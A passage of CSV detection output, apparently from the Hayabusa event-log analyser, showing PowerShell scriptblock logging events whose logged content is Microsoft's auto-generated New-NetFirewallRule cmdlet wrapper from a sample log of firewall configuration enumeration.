($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.661 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetFirewallRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction] ${Direction}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action] ${Action}, [Parameter(ParameterSetName='cim:CreateInstance0')] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('LSM')] [bool] ${LooseSourceMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${LocalOnlyMapping}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Owner}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Program}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Package}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Service}, [Parameter(ParameterSetName='cim:CreateInstance0')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${LocalUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteUser}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] 
${Encryption}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = 
$true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value =",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.661 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = 
$false if ($PSBoundParameters.ContainsKey('Direction')) { [object]$__cmdletization_value = ${Direction} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Direction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Action')) { [object]$__cmdletization_value = ${Action} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Action'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy')) { 
[object]$__cmdletization_value = ${EdgeTraversalPolicy} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EdgeTraversalPolicy'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LooseSourceMapping')) { [object]$__cmdletization_value = ${LooseSourceMapping} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LooseSourceMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalOnlyMapping')) { [object]$__cmdletization_value = ${LocalOnlyMapping} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalOnlyMapping'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Owner')) { [object]$__cmdletization_value = ${Owner} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Owner'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_m,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.661 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ethodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
